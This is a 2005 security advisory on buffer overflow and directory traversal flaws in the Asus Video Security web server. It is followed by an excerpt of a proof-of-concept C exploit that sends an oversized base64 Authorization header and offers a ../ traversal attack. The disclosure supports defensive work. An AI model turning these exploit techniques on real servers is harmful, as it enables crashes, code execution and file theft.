Asus Video Security Multiple Vulnerabilities (Buffer Overflow, Directory Traversal)
3 Nov. 2005
Summary
"VideoSecurity Online provides you with various security monitoring modes."
Asus Video Security does not properly validate user-provided input, allowing attackers to execute arbitrary code through a buffer overflow and to read files through a directory traversal vulnerability.
Vulnerable Systems:
* Asus Video Security version 3.5.0.0 and prior
Asus Video Security is monitoring software bundled with Asus graphics cards. By default the built-in web server is disabled, so these bugs can be exploited "only" if it has been manually activated.
Buffer Overflow:
A buffer overflow occurs during the handling of the base64-decoded username:password string sent in the Authorization header to a password-protected ASUS Video Security web server.
The server is not vulnerable unless authorization is in use.
Directory Traversal:
The built-in web server is also vulnerable to a classical directory traversal bug which allows an attacker to download any file on the disk where the program is installed.
This is possible using the dot-dot-slash (../) and dot-dot-backslash (..\) patterns (HTTP-encoded characters are not allowed by the web server).
If the server is password-protected, the attacker must know the correct password.
    fputs("\n"
        "ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web: http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attack:\n"
            "1 = authorization buffer-overflow, works only if server uses password\n"
            "2 = directory traversal, if the server uses a password you must know it\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);
    if(argc > 3) port = atoi(argv[3]);

    p = strstr(buff, "\r\n\r\n");
    if(p) *p = 0;
    if(strstr(buff, "Authenticate")) {
        auth = 1;
        fputs("- server uses password\n", stdout);
    }

    *uri = 0;
    *more = 0;

    switch(attack) {
        case 1: {
            if(!auth) {
                printf(" Alert: the server doesn't use password so is not vulnerable to this attack\n");
            }
            memset(buff, 'A', BOFSZ);
            len = BOFSZ;
            b64 = base64_encode(buff, &len);
            sprintf(more, "Authorization: Basic %s\r\n", b64);
            free(b64);
        } break;